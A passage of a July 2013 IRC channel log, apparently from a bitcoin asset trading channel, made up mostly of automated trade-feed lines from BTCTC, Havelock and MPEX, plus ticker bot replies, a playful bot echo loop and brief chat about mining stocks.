04:37:05 [HAVELOCK] [AM100] 3 @ 0.04096 = 0.1229 BTC [-] Jul 13 04:38:33 [BTCTC] [GSDPT] 8 @ 0.002199 = 0.0176 BTC [+] Jul 13 04:38:45 [BTCTC] [ASICMINER-PT] 1 @ 4.248497 BTC [+] Jul 13 04:39:20 mircea_popescu: Jul 13 04:39:26 lemme buy some credits!!! Jul 13 04:39:42 [BTCTC] [GSDPT] 1 @ 0.0022 BTC [+] Jul 13 04:40:56 [BTCTC] [GSDPT] 20 @ 0.0023 = 0.046 BTC [+] Jul 13 04:43:03 [BTCTC] [BASIC-MINING] 5 @ 0.875016 = 4.3751 BTC [+] Jul 13 04:44:14 [BTCTC] [BASIC-MINING] 5 @ 0.875015 = 4.3751 BTC [-] Jul 13 04:51:51 [BTCTC] [ASICMINER-PT] 1 @ 4.242 BTC [-] Jul 13 04:53:19 [BTCTC] [DMS.MINING] 48 @ 0.014997 = 0.7199 BTC [-] Jul 13 04:53:53 [BTCTC] [ASICMINER-PT] 1 @ 4.248497 BTC [+] Jul 13 04:54:29 [BTCTC] [DMS.MINING] 50 @ 0.014998 = 0.7499 BTC [+] Jul 13 04:55:15 [HAVELOCK] [SDSTM] 5 @ 0.0148 = 0.074 BTC [-] Jul 13 04:55:20 [BTCTC] [DMS.MINING] 30 @ 0.015 = 0.45 BTC [+] Jul 13 04:57:02 [BTCTC] [ASICMINER-PT] 1 @ 4.248497 BTC [+] Jul 13 04:57:27 [HAVELOCK] [SDSTM] 7 @ 0.0149 = 0.1043 BTC [+] Jul 13 04:58:19 [BTCTC] [DMS.PURCHASE] 17 @ 0.040366 = 0.6862 BTC [-] Jul 13 05:00:21 [HAVELOCK] [SDSTM] 350 @ 0.013 = 4.55 BTC [-] Jul 13 05:01:18 [HAVELOCK] [SDSTM] 2 @ 0.01301 = 0.026 BTC [+] Jul 13 05:02:55 [HAVELOCK] [SDSTM] 6 @ 0.01256 = 0.0754 BTC [-] Jul 13 05:02:56 [BTCTC] [DMS.SELLING] 9 @ 0.026003 = 0.234 BTC [-] Jul 13 05:02:57 [BTCTC] [DMS.SELLING] 10 @ 0.026001 = 0.26 BTC [-] Jul 13 05:02:58 [BTCTC] [DMS.SELLING] 10 @ 0.026 = 0.26 BTC [-] Jul 13 05:03:00 [HAVELOCK] [SDSTM] 1 @ 0.01200001 BTC [-] Jul 13 05:03:07 [HAVELOCK] [SDSTM] 45 @ 0.012 = 0.54 BTC [-] Jul 13 05:03:47 [BTCTC] [DMS.PURCHASE] 19 @ 0.040366 = 0.767 BTC [-] Jul 13 05:09:53 [BTCTC] [BASIC-MINING] 5 @ 0.889998 = 4.45 BTC [+] Jul 13 05:16:35 [BTCTC] [BTC-TRADING-PT] 2 @ 0.7903 = 1.5806 BTC [+] Jul 13 05:18:07 [BTCTC] [TAT.ASICMINER] 5 @ 0.042381 = 0.2119 BTC [+] Jul 13 05:19:25 [BTCTC] [DMS.SELLING] 1 @ 0.0259 BTC [-] Jul 13 05:20:00 [BTCTC] [DMS.SELLING] 32 @ 0.02675 = 0.856 BTC [+] Jul 13 05:26:21 ;;ticker Jul 13 05:26:21 MtGox BTCUSD ticker | Best bid: 89.11000, Best ask: 89.31000, Bid-ask spread: 0.20000, Last trade: 89.10000, 24 hour volume: 92799.69609521, 24 hour low: 89.03936, 24 hour high: 104.17188, 24 hour vwap: 96.83193 Jul 13 05:27:47 hey tat you get anything out of gox yet? Jul 13 05:31:11 >:D Jul 13 05:31:32 [BTCTC] [PAJKA.BOND] 15 @ 0.05 = 0.75 BTC [+] Jul 13 05:33:15 [BTCTC] [BASIC-MINING] 4 @ 0.875006 = 3.5 BTC [-] Jul 13 05:33:18 [BTCTC] [ASICMINER-PT] 1 @ 4.175 BTC [-] Jul 13 05:33:21 [BTCTC] [ASICMINER-PT] 1 @ 4.17 BTC [-] Jul 13 05:33:23 [BTCTC] [ASICMINER-PT] 7 @ 4.15 = 29.05 BTC [-] Jul 13 05:33:38 [BTCTC] [BASIC-MINING] 1 @ 0.8899 BTC [+] Jul 13 05:34:51 anybody know these guys? https://bitcointalk.org/index.php?topic=255235.0 Jul 13 05:35:16 Power Hash Mining (PHM), apparently IPO'ing on havelock Jul 13 05:35:41 [HAVELOCK] [SDSTM] 10 @ 0.01152 = 0.1152 BTC [-] Jul 13 05:35:42 [HAVELOCK] [SDSTM] 90 @ 0.01152 = 1.0368 BTC [-] Jul 13 05:35:43 [HAVELOCK] [SDSTM] 100 @ 0.01151001 = 1.151 BTC [-] Jul 13 05:35:44 [HAVELOCK] [SDSTM] 5 @ 0.01121 = 0.0561 BTC [-] Jul 13 05:35:45 [HAVELOCK] [SDSTM] 300 @ 0.0111 = 3.33 BTC [-] Jul 13 05:36:11 [HAVELOCK] [SDSTM] 2 @ 0.0107 = 0.0214 BTC [-] Jul 13 05:36:13 [HAVELOCK] [SDSTM] 10 @ 0.0105 = 0.105 BTC [-] Jul 13 05:36:14 [HAVELOCK] [SDSTM] 10 @ 0.01001 = 0.1001 BTC [-] Jul 13 05:36:47 nope Jul 13 05:38:33 [HAVELOCK] [SDSTM] 10 @ 0.0095 = 0.095 BTC [-] Jul 13 05:38:34 [HAVELOCK] [SDSTM] 15 @ 0.00912 = 0.1368 BTC [-] Jul 13 05:38:35 [HAVELOCK] [SDSTM] 188 @ 0.00910101 = 1.711 BTC [-] Jul 13 05:48:56 [HAVELOCK] [SDSTM] 2 @ 0.013 = 0.026 BTC [+] Jul 13 05:49:01 [BTCTC] [B.YABMC] 1 @ 0.002499 BTC [-] Jul 13 05:50:04 [BTCTC] [DMS.SELLING] 15 @ 0.026989 = 0.4048 BTC [+] Jul 13 05:50:36 [BTCTC] [DMS.SELLING] 30 @ 0.02699 = 0.8097 BTC [+] Jul 13 05:53:41 [HAVELOCK] [SDSTM] 74 @ 0.013 = 0.962 BTC [+] Jul 13 05:53:59 [BTCTC] [AMC-PT] 75 @ 0.0025 = 0.1875 BTC [+] Jul 13 05:55:31 [BTCTC] [TAT.VIRTUALMINE] 25 @ 0.004147 = 0.1037 BTC [+] Jul 13 05:57:40 [BTCTC] [DMS.SELLING] 20 @ 0.02699 = 0.5398 BTC [+] Jul 13 06:04:32 [BTCTC] [TAT.ASICMINER] 1 @ 0.041999 BTC [-] Jul 13 06:05:56 [BTCTC] [ASICMINER-PT] 1 @ 4.145 BTC [-] Jul 13 06:05:58 [BTCTC] [ASICMINER-PT] 1 @ 4.13 BTC [-] Jul 13 06:10:50 [BTCTC] [AMC-PT] 25 @ 0.0025 = 0.0625 BTC [+] Jul 13 06:11:11 [BTCTC] [TAT.ASICMINER] 8 @ 0.0419 = 0.3352 BTC [-] Jul 13 06:11:13 [BTCTC] [TAT.ASICMINER] 80 @ 0.0419 = 3.352 BTC [-] Jul 13 06:13:43 [BTCTC] [ASICMINER-PT] 1 @ 4.123501 BTC [-] Jul 13 06:14:03 [BTCTC] [DMS.MINING] 10 @ 0.0145 = 0.145 BTC [-] Jul 13 06:15:08 [MPEX] [S.MPOE] 3888 @ 0.00082678 = 3.2145 BTC [+] Jul 13 06:18:01 [MPEX] [S.MPOE] 7150 @ 0.00082524 = 5.9005 BTC [-] Jul 13 06:18:03 [MPEX] [S.MPOE] 3850 @ 0.0008247 = 3.1751 BTC [-] Jul 13 06:19:17 [BTCTC] [ASICMINER-PT] 1 @ 4.124 BTC [+] Jul 13 06:19:21 [BTCTC] [ASICMINER-PT] 1 @ 4.123501 BTC [-] Jul 13 06:21:14 [BTCTC] [DMS.PURCHASE] 10 @ 0.040366 = 0.4037 BTC [-] Jul 13 06:22:03 [BTCTC] [BASIC-MINING] 5 @ 0.889499 = 4.4475 BTC [-] Jul 13 06:24:23 [BTCTC] [DMS.SELLING] 10 @ 0.027239 = 0.2724 BTC [+] Jul 13 06:32:47 [BTCTC] [TAT.ASICMINER] 1 @ 0.041994 BTC [+] Jul 13 06:33:31 u guys think basic mining is overvalued? Jul 13 06:36:25 [BTCTC] [DMS.PURCHASE] 200 @ 0.040366 = 8.0732 BTC [-] Jul 13 06:37:22 [BTCTC] [BASIC-MINING] 3 @ 0.879005 = 2.637 BTC [-] Jul 13 06:39:38 [BTCTC] [BASIC-MINING] 6 @ 0.879005 = 5.274 BTC [-] Jul 13 06:44:16 [HAVELOCK] [SDSTM] 1 @ 0.01 BTC [-] Jul 13 06:44:21 [HAVELOCK] [SDSTM] 3 @ 0.00920002 = 0.0276 BTC [-] Jul 13 06:44:26 [HAVELOCK] [SDSTM] 2 @ 0.00920001 = 0.0184 BTC [-] Jul 13 06:44:30 [HAVELOCK] [SDSTM] 100 @ 0.00920001 = 0.92 BTC [-] Jul 13 06:45:16 [HAVELOCK] [SDSTM] 100 @ 0.0092 = 0.92 BTC [-] Jul 13 06:45:30 [HAVELOCK] [SDSTM] 100 @ 0.00910101 = 0.9101 BTC [-] Jul 13 06:45:43 [HAVELOCK] [SDSTM] 44 @ 0.00910101 = 0.4004 BTC [-] Jul 13 06:46:24 [BTCTC] [BASIC-MINING] 3 @ 0.879 = 2.637 BTC [-] Jul 13 06:49:14 [HAVELOCK] [SDSTM] 100 @ 0.00910101 = 0.9101 BTC [-] Jul 13 06:49:43 [HAVELOCK] [SDSTM] 68 @ 0.00910101 = 0.6189 BTC [-] Jul 13 06:50:04 [HAVELOCK] [SDSTM] 221 @ 0.009 = 1.989 BTC [-] Jul 13 06:50:05 [HAVELOCK] [SDSTM] 5 @ 0.009 = 0.045 BTC [-] Jul 13 06:50:21 [HAVELOCK] [SDSTM] 10 @ 0.0089 = 0.089 BTC [-] Jul 13 06:50:25 [HAVELOCK] [SDSTM] 5 @ 0.0086 = 0.043 BTC [-] Jul 13 06:50:30 [HAVELOCK] [SDSTM] 5 @ 0.0085 = 0.0425 BTC [-] Jul 13 06:50:34 [HAVELOCK] [SDSTM] 4 @ 0.0081 = 0.0324 BTC [-] Jul 13 06:56:18 [BTCTC] [BASIC-MINING] 1 @ 0.875 BTC [-] Jul 13 06:57:56 [BTCTC] [DMS.PURCHASE] 7 @ 0.040366 = 0.2826 BTC [-] Jul 13 06:58:11 [HAVELOCK] [AM100] 14 @ 0.040953 = 0.5733 BTC [-] Jul 13 07:00:36 [BTCTC] [DMS.MINING] 15 @ 0.0145 = 0.2175 BTC [-] Jul 13 07:01:20 [BTCTC] [DMS.PURCHASE] 5 @ 0.040366 = 0.2018 BTC [-] Jul 13 07:03:23 [BTCTC] [DMS.MINING] 12 @ 0.0147 = 0.1764 BTC [+] Jul 13 07:07:30 [BTCTC] [DMS.MINING] 1 @ 0.014979 BTC [+] Jul 13 07:08:28 [BTCTC] [TAT.VIRTUALMINE] 1 @ 0.004147 BTC [+] Jul 13 07:11:52 [BTCTC] [BASIC-MINING] 1 @ 0.871 BTC [-] Jul 13 07:11:54 [BTCTC] [BASIC-MINING] 1 @ 0.87 BTC [-] Jul 13 07:11:56 [BTCTC] [BASIC-MINING] 1 @ 0.86 BTC [-] Jul 13 07:20:20 [BTCTC] [BFMINES] 75 @ 0.003999 = 0.2999 BTC [+] Jul 13 07:22:17 [BTCTC] [DMS.MINING] 30 @ 0.014979 = 0.4494 BTC [+] Jul 13 07:22:20 [BTCTC] [DMS.MINING] 35 @ 0.01498 = 0.5243 BTC [+] Jul 13 07:22:22 [BTCTC] [DMS.MINING] 125 @ 0.01499 = 1.8738 BTC [+] Jul 13 07:22:22 [BTCTC] [DMS.MINING] 19 @ 0.015 = 0.285 BTC [+] Jul 13 07:22:23 [BTCTC] [DMS.MINING] 41 @ 0.0151 = 0.6191 BTC [+] Jul 13 07:25:03 [BTCTC] [DMS.PURCHASE] 60 @ 0.040366 = 2.422 BTC [-] Jul 13 07:39:35 [BTCTC] [DMS.PURCHASE] 11 @ 0.040366 = 0.444 BTC [-] Jul 13 07:46:49 [BTCTC] [PAJKA.BOND] 1 @ 0.053115 BTC [+] Jul 13 07:50:57 [BTCTC] [ASICMINER-PT] 1 @ 4.125 BTC [+] Jul 13 07:50:59 [BTCTC] [ASICMINER-PT] 1 @ 4.1238 BTC [-] Jul 13 08:02:17 [BTCTC] [DMS.PURCHASE] 5 @ 0.040366 = 0.2018 BTC [-] Jul 13 08:03:15 [BTCTC] [DMS.MINING] 9 @ 0.015099 = 0.1359 BTC [-] Jul 13 08:03:42 [BTCTC] [BASIC-MINING] 3 @ 0.800001 = 2.4 BTC [-] Jul 13 08:06:37 [BTCTC] [DMS.PURCHASE] 203 @ 0.040366 = 8.1943 BTC [-] Jul 13 08:14:18 [BTCTC] [AMC-PT] 2 @ 0.00245 = 0.0049 BTC [-] Jul 13 08:23:52 [BTCTC] [TAT.ASICMINER] 19 @ 0.041975 = 0.7975 BTC [-] Jul 13 08:26:41 [BTCTC] [S.DICE-PT] 13 @ 0.002054 = 0.0267 BTC [+] Jul 13 08:27:20 [BTCTC] [TAT.ASICMINER] 3 @ 0.041974 = 0.1259 BTC [-] Jul 13 08:38:22 [BTCTC] [DMS.PURCHASE] 2 @ 0.040366 = 0.0807 BTC [-] Jul 13 08:39:11 [BTCTC] [TAT.ASICMINER] 22 @ 0.041501 = 0.913 BTC [-] **** BEGIN LOGGING AT Sat Jul 13 12:39:31 2013 Jul 13 12:39:56 [BTCTC] [ASICMINER-PT] 1 @ 4.2485 BTC [+] Jul 13 12:40:36 [BTCTC] [DMS.SELLING] 83 @ 0.027239 = 2.2608 BTC [+] Jul 13 12:48:37 [BTCTC] [ASICMINER-PT] 1 @ 4.238 BTC [-] Jul 13 12:50:14 [BTCTC] [TAT.ASICMINER] 107 @ 0.042 = 4.494 BTC [+] Jul 13 12:52:43 [BTCTC] [TAT.ASICMINER] 100 @ 0.042 = 4.2 BTC [+] Jul 13 12:56:12 ;;tslb Jul 13 12:56:15 Time since last block: 24 minutes and 40 seconds Jul 13 13:00:37 [HAVELOCK] [SDSTM] 3 @ 0.006101 = 0.0183 BTC [-] Jul 13 13:00:54 [BTCTC] [AMC-PT] 1564 @ 0.002499 = 3.9084 BTC [+] Jul 13 13:00:55 [BTCTC] [AMC-PT] 436 @ 0.0025 = 1.09 BTC [+] Jul 13 13:01:07 [BTCTC] [DMS.MINING] 20 @ 0.015199 = 0.304 BTC [+] Jul 13 13:06:20 [BTCTC] [DMS.MINING] 4 @ 0.0152 = 0.0608 BTC [+] Jul 13 13:06:21 [BTCTC] [DMS.MINING] 135 @ 0.0154 = 2.079 BTC [+] Jul 13 13:06:23 [BTCTC] [DMS.MINING] 11 @ 0.015499 = 0.1705 BTC [+] Jul 13 13:06:24 [BTCTC] [DMS.MINING] 33 @ 0.0155 = 0.5115 BTC [+] Jul 13 13:09:58 http://pastebin.com/raw.php?i=8NcxYw8R Jul 13 13:10:02 ;;echo http://pastebin.com/raw.php?i=8NcxYw8R Jul 13 13:10:03 http://pastebin.com/raw.php?i=8NcxYw8R Jul 13 13:10:04 ;;echo http://pastebin.com/raw.php?i=8NcxYw8R Jul 13 13:10:04 http://pastebin.com/raw.php?i=8NcxYw8R Jul 13 13:10:05 ;;echo http://pastebin.com/raw.php?i=8NcxYw8R Jul 13 13:10:05 http://pastebin.com/raw.php?i=8NcxYw8R Jul 13 13:10:06 nice Jul 13 13:10:07 ;;echo http://pastebin.com/raw.php?i=8NcxYw8R Jul 13 13:10:07 http://pastebin.com/raw.php?i=8NcxYw8R Jul 13 13:10:08 ;;echo http://pastebin.com/raw.php?i=8NcxYw8R Jul 13 13:10:08 http://pastebin.com/raw.php?i=8NcxYw8R Jul 13 13:10:09 ;;echo http://pastebin.com/raw.php?i=8NcxYw8R Jul 13 13:10:09 http://pastebin.com/raw.php?i=8NcxYw8R Jul 13 13:10:10 ;;echo http://pastebin.com/raw.php?i=8NcxYw8R Jul 13 13:10:10 http://pastebin.com/raw.php?i=8NcxYw8R Jul 13 13:10:11 ;;echo http://pastebin.com/raw.php?i=8NcxYw8R Jul 13 13:10:11 http://pastebin.com/raw.php?i=8NcxYw8R Jul 13 13:10:12 ;;echo http://pastebin.com/raw.php?i=8NcxYw8R Jul 13 13:10:12 http://pastebin.com/raw.php?i=8NcxYw8R Jul 13 13:10:13 ;;echo http://pastebin.com/raw.php?i=8NcxYw8R Jul 13 13:11:47 [BTCTC] [BASIC-MINING] 1 @ 0.76005 BTC [-] Jul 13 13:12:03 now I have to figure out a way to get assbot into this Jul 13 13:12:45 till everything is flooded? Jul 13 13:13:03 no just a 3 bot deathmatch Jul 13 13:13:18 [BTCTC] [AMC-PT] 463 @ 0.0025 = 1.1575 BTC [+] Jul 13 13:18:34 [BTCTC] [TAT.ASICMINER] 3 @ 0.042 = 0.126 BTC [+] Jul 13 13:22:03 [BTCTC] [DMS.PURCHASE] 5 @ 0.040366 = 0.2018 BTC [-] Jul 13 13:22:34 [BTCTC] [BFMINES] 5 @ 0.003999 = 0.02 BTC [+] Jul 13 13:24:05 [BTCTC] [DMS.PURCHASE] 200 @ 0.040366 = 8.0732 BTC [-] Jul 13 13:36:22 [BTCTC] [ASICMINER-PT] 1 @ 4.242 BTC [+] Jul 13 13:37:16 ajhaha good 1 Jul 13 13:40:00 [BTCTC] [AMC-PT] 100 @ 0.0025 = 0.25 BTC [+] Jul 13 13:43:15 [BTCTC] [AMC-PT] 100 @ 0.0025 = 0.25 BTC [+] Jul 13 13:45:18 [BTCTC] [AMC-PT] 200 @ 0.0025 = 0.5 BTC [+] Jul 13 13:45:26 [BTCTC] [AMC-PT] 100 @ 0.0025 = 0.25 BTC [+] Jul 13 13:50:22 http://upload.wikimedia.org/wikipedia/commons/c/cf/Lettow's_surrender.jpg Jul 13 13:50:48 kickass war illustration. two white dudes screaming at each other and a bunch of black dudes going wtf is with these two Jul 13 13:52:40 [HAVELOCK] [AM100] 5 @ 0.039612 = 0.1981 BTC [-] Jul 13 13:53:56 [BTCTC] [DMS.SELLING] 47 @ 0.027239 = 1.2802 BTC [+] Jul 13 13:53:58 [BTCTC] [DMS.SELLING] 167 @ 0.02724 = 4.5491 BTC [+] Jul 13 13:55:58 [BTCTC] [ASICMINER-PT] 1 @ 4.276 BTC [+] Jul 13 13:56:15 [BTCTC] [ASICMINER-PT] 2 @ 4.279994 = 8.56 BTC [+] Jul 13 13:56:29 [BTCTC] [ASICMINER-PT] 5 @ 4.279995 = 21.4 BTC [+] Jul 13 13:59:37 [BTCTC] [ASICMINER-PT] 1 @ 4.293994 BTC [+] Jul 13 14:01:55 [HAVELOCK] [SDSTM] 150 @ 0.0079899 = 1.1985 BTC [+] Jul 13 14:02:23 [HAVELOCK] [SDSTM] 900 @ 0.00799 = 7.191 BTC [+] Jul 13 14:05:08 [HAVELOCK] [SDSTM] 1 @ 0.0089 BTC [+] Jul 13 14:12:57 [BTCTC] [BITVPS] 10 @ 0.0021 = 0.021 BTC [+] Jul 13 14:12:59 [BTCTC] [BITVPS] 100 @ 0.002198 = 0.2198 BTC [+] Jul 13 14:17:33 [BTCTC] [BTC-BOND] 300 @ 0.009996 = 2.9988 BTC [+] Jul 13 14:24:15 [BTCTC] [S.DICE-PT] 1 @ 0.00228 BTC [-] Jul 13 14:24:17 [BTCTC] [S.DICE-PT] 10 @ 0.00215 = 0.0215 BTC [-] Jul 13 14:24:18 [BTCTC] [S.DICE-PT] 100 @ 0.002137 = 0.2137 BTC [-] Jul 13 14:24:20 [BTCTC] [S.DICE-PT] 250 @ 0.002136 = 0.534 BTC [-] Jul 13 14:24:21 [BTCTC] [S.DICE-PT] 15 @ 0.002136 = 0.032 BTC [-] Jul 13 14:24:22 [BTCTC] [S.DICE-PT] 332 @ 0.002135 = 0.7088 BTC [-] Jul 13 14:24:23 [BTCTC] [S.DICE-PT] 150 @ 0.002111 = 0.3167 BTC [-] Jul 13 14:24:31 [BTCTC] [S.DICE-PT] 150 @ 0.00211 = 0.3165 BTC [-] Jul 13 14:24:33 [BTCTC] [S.DICE-PT] 250 @ 0.0021 = 0.525 BTC [-] Jul 13 14:24:35 [BTCTC] [S.DICE-PT] 1300 @ 0.0021 = 2.73 BTC [-] Jul 13 14:24:48 [BTCTC] [TAT.ASICMINER] 3 @ 0.042001 = 0.126 BTC [+] Jul 13 14:25:27 [BTCTC] [DMS.MINING] 1 @ 0.0154 BTC [-] Jul 13 14:25:43 [BTCTC] [GSDPT] 2 @ 0.002072 = 0.0041 BTC [-] Jul 13 14:26:50 [BTCTC] [ASICMINER-PT] 2 @ 4.289999 = 8.58 BTC [-] Jul 13 14:26:52 [BTCTC] [S.BBET-PT] 4 @ 0.0016 = 0.0064 BTC [-] Jul 13 14:26:53 [BTCTC] [ASICMINER-PT] 6 @ 4.29 = 25.74 BTC [+] Jul 13 14:26:53 [BTCTC] [S.BBET-PT] 1 @ 0.001501 BTC [-] Jul 13 14:26:55 [BTCTC] [S.BBET-PT] 150 @ 0.0015 = 0.225 BTC [-] Jul 13 14:27:22 [BTCTC] [BASIC-MINING] 2 @ 0.765001 = 1.53 BTC [+] Jul 13 14:27:38 [BTCTC] [ASICMINER-PT] 1 @ 4.29 BTC [+] Jul 13 14:28:00 [BTCTC] [S.MPOE-PT] 84 @ 0.000816 = 0.0685 BTC [-] Jul 13 14:28:02 [BTCTC] [S.MPOE-PT] 200 @ 0.000816 = 0.1632 BTC [-] Jul 13 14:28:10 [BTCTC] [S.MPOE-PT] 14 @ 0.000816 = 0.0114 BTC [-] Jul 13 14:28:32 [BTCTC] [ASICMINER-PT] 1 @ 4.29 BTC [+] Jul 13 14:29:13 [BTCTC] [DMS.MINING] 9 @ 0.0154 = 0.1386 BTC [-] Jul 13 14:29:41 [BTCTC] [S.MPOE-PT] 976 @ 0.000815 = 0.7954 BTC [-] Jul 13 14:29:55 [BTCTC] [ASICMINER-PT] 10 @ 4.29 = 42.9 BTC [+] Jul 13 14:30:29 [BTCTC] [ASICMINER-PT] 1 @ 4.29 BTC [+] Jul 13 14:30:51 [MPEX] [O.USD.P101T] 650 @ 0.09015852 = 58.603 BTC [-] Jul 13 14:31:44 [MPEX] [S.MG] 5000 @ 0.00014 = 0.7 BTC [-] Jul 13 14:31:46 [MPEX] [S.MG] 5000 @ 0.00013 = 0.65 BTC [-] Jul 13 14:32:48 [BTCTC] [TAT.ASICMINER] 56 @ 0.042449 = 2.3771 BTC [+] Jul 13 14:32:57 [BTCTC] [DMS.SELLING] 56 @ 0.027 = 1.512 BTC [-] Jul 13 14:33:02 [MPEX] [S.MG] 2999 @ 0.0001699 = 0.5095 BTC [+] Jul 13 14:33:05 [MPEX] [S.MG] 10000 @ 0.0001705 = 1.705 BTC [+] Jul 13 14:33:07 [MPEX] [S.MG] 5001 @ 0.0001708 = 0.8542 BTC [+] Jul 13 14:34:36 [BTCTC] [DMS.MINING] 1 @ 0.0153 BTC [-] Jul 13 14:34:38 [MPEX] [S.MPOE] 9850 @ 0.00082621 = 8.1382 BTC [+] Jul 13 14:35:58 [BTCTC] [DMS.MINING] 9 @ 0.0153 = 0.1377 BTC [-] Jul 13 14:36:00 [BTCTC] [DMS.MINING] 10 @ 0.0152 = 0.152 BTC [-] Jul 13 14:36:02 [BTCTC] [DMS.MINING] 36 @ 0.015199 = 0.5472 BTC [-] Jul 13 14:37:58 [BTCTC] [DMS.MINING] 50 @ 0.015499 = 0.775 BTC [+] Jul 13 14:40:29 [BTCTC] [S.DICE-PT] 1 @ 0.002369 BTC [+] Jul 13 14:57:55 [BTCTC] [ASICMINER-PT] 1 @ 4.242 BTC [-] Jul 13 14:58:30 [BTCTC] [ASICMINER-PT] 1 @ 4.230001 BTC [-] Jul 13 14:59:07 [BTCTC] [ASICMINER-PT] 2 @ 4.23 = 8.46 BTC [-] Jul 13 14:59:59 [MPEX] [S.BBET] 18000 @ 0.00056 = 10.08 BTC [+] Jul 13 15:00:01 [MPEX] [S.BBET] 1000 @ 0.00055051 = 0.5505 BTC [-] Jul 13 15:00:03 [MPEX] [S.BBET] 1000 @ 0.0005505 = 0.5505 BTC [-] Jul 13 15:03:42 is MP on? Jul 13 15:03:46 BTCOxygen? Jul 13 15:04:08 MiningBuddy? PsychoticBoy? PM me. Serious. Jul 13 15:04:29 what's happening TradeFortress ? Jul 13 15:04:39 [BTCTC] [RSM] 165 @ 0.014399 = 2.3758 BTC [+] Jul 13 15:04:41 [BTCTC] [RSM] 1 @ 0.0144 BTC [+] Jul 13 15:04:42 [BTCTC] [RSM] 30 @ 0.0145 = 0.435 BTC [+] Jul 13 15:05:00 yea Jul 13 15:05:09 mircea_popescu, can I PM you? Jul 13 15:05:12 go ahead Jul 13 15:07:31 [BTCTC] [ASICMINER-PT] 1 @ 4.228 BTC [-] Jul 13 15:08:23 [BTCTC] [BASIC-MINING] 6 @ 0.775 = 4.65 BTC [+] Jul 13 15:09:20 [BTCTC] [COGNITIVE] 1 @ 0.445001 BTC [-] Jul 13 15:09:22 [BTCTC] [COGNITIVE] 4 @ 0.445 = 1.78 BTC [-] Jul 13 15:09:36 [BTCTC] [RSM] 3 @ 0.015 = 0.045 BTC [+] Jul 13 15:10:01 hmm.. BBET sold for MG? .. Jul 13 15:10:48 "@mircea_popescu haiii my name hiko.are you know where is gay place in timisoara? I stay near with opera romana.thanks" Jul 13 15:10:52 twitter ;/ Jul 13 15:11:49 [BTCTC] [TAT.ASICMINER] 31 @ 0.042439 = 1.3156 BTC [-] Jul 13 15:13:09 [BTCTC] [ASICMINER-PT] 1 @ 4.228 BTC [-] Jul 13 15:13:51 [BTCTC] [DMS.SELLING] 90 @ 0.02724 = 2.4516 BTC [+] Jul 13 15:15:31 [HAVELOCK] [SDICE] 1 @ 0.2 BTC [-] Jul 13 15:17:34 [BTCTC] [DMS.MINING] 17 @ 0.0155 = 0.2635 BTC [+] Jul 13 15:17:35 [BTCTC] [DMS.MINING] 5 @ 0.0155 = 0.0775 BTC [+] Jul 13 15:18:20 [BTCTC] [AMC-PT] 6 @ 0.0025 = 0.015 BTC [+] Jul 13 15:19:47 [BTCTC] [BASIC-MINING] 1 @ 0.7705 BTC [-] Jul 13 15:19:49 [BTCTC] [BASIC-MINING] 5 @ 0.7705 = 3.8525 BTC [-] Jul 13 15:21:22 [BTCTC] [BASIC-MINING] 2 @ 0.77 = 1.54 BTC [-] Jul 13 15:21:34 [BTCTC] [TAT.VIRTUALMINE] 64 @ 0.004147 = 0.2654 BTC [+] Jul 13 15:21:46 [BTCTC] [BASIC-MINING] 2 @ 0.760081 = 1.5202 BTC [-] Jul 13 15:23:07 [BTCTC] [BITVPS] 250 @ 0.002056 = 0.514 BTC [-] Jul 13 15:23:09 [BTCTC] [BITVPS] 300 @ 0.002055 = 0.6165 BTC [-] Jul 13 15:23:28 [BTCTC] [TAT.VIRTUALMINE] 55 @ 0.00421 = 0.2316 BTC [+] Jul 13 15:24:50 [BTCTC] [DMS.SELLING] 4 @ 0.02724 = 0.109 BTC [+] Jul 13 15:24:51 [BTCTC] [DMS.SELLING] 41 @ 0.027398 = 1.1233 BTC [+] Jul 13 15:27:10 [BTCTC] [BASIC-MINING] 4 @ 0.760083 = 3.0403 BTC [+] Jul 13 15:27:54 [MPEX] [O.USD.C047T] 1000 @ 0.4915984 = 491.5984 BTC [-] Jul 13 15:28:22 [BTCTC] [COGNITIVE] 1 @ 0.460001 BTC [+] Jul 13 15:28:39 ;;ticker Jul 13 15:28:40 MtGox BTCUSD ticker | Best bid: 94.80000, Best ask: 94.97999, Bid-ask spread: 0.17999, Last trade: 94.80000, 24 hour volume: 50965.60443528, 24 hour low: 87.76404, 24 hour high: 101.99000, 24 hour vwap: 93.76795 Jul 13 15:28:50 interesting. Jul 13 15:30:38 [BTCTC] [B.YABMC] 2 @ 0.0025 = 0.005 BTC [+] Jul 13 15:31:24 [BTCTC] [ASICMINER-PT] 1 @ 4.293799 BTC [+] Jul 13 15:31:27 [BTCTC] [DMS.SELLING] 59 @ 0.027398 = 1.6165 BTC [+] Jul 13 15:32:00 [BTCTC] [B.YABMC] 5 @ 0.0025 = 0.0125 BTC [+] Jul 13 15:32:10 [BTCTC] [BASIC-MINING] 6 @ 0.760082 = 4.5605 BTC [-] Jul 13 15:32:58 [MPEX] [O.USD.C047T] 1000 @ 0.49176478 = 491.7648 BTC [+] Jul 13 15:35:13 heh Jul 13 15:35:52 mircea_popescu: how often does the OIX update? is it live? Jul 13 15:35:58 yeah. Jul 13 15:36:05 but it only takes sales. these were buys Jul 13 15:36:59 ah, k Jul 13 15:37:56 [BTCTC] [DMS.SELLING] 104 @ 0.027398 = 2.8494 BTC [+] Jul 13 15:37:58 [BTCTC] [DMS.SELLING] 143 @ 0.027 = 3.861 BTC [-] Jul 13 15:42:32 [BTCTC] [ASICMINER-PT] 1 @ 4.295 BTC [+] Jul 13 15:42:59 [BTCTC] [DMS.SELLING] 20 @ 0.025811 = 0.5162 BTC [-] Jul 13 15:43:01 [BTCTC] [DMS.SELLING] 25 @ 0.02581 = 0.6453 BTC [-] Jul 13 15:43:03 [BTCTC] [DMS.SELLING] 44 @ 0.0258 = 1.1352 BTC [-] Jul 13 15:43:18 [BTCTC] [DMS.MINING] 51 @ 0.015589 = 0.795 BTC [+] Jul 13 15:43:37 [BTCTC] [DMS.MINING] 128 @ 0.0155 = 1.984 BTC [-] Jul 13 15:44:18 [BTCTC] [DMS.MINING] 10 @ 0.015301 = 0.153 BTC [-] Jul 13 15:44:22 [BTCTC] [DMS.MINING] 10 @ 0.015301 = 0.153 BTC [-] Jul 13 15:44:24 [BTCTC] [DMS.MINING] 2 @ 0.015199 = 0.0304 BTC [-] Jul 13 15:44:26 [BTCTC] [DMS.MINING] 10 @ 0.015001 = 0.15 BTC [-] Jul 13 15:44:27 [BTCTC] [DMS.MINING] 100 @ 0.015 = 1.5 BTC [-] Jul 13 15:45:22 [BTCTC] [COGNITIVE] 1 @ 0.47 BTC [+] Jul 13 15:45:40 [BTCTC] 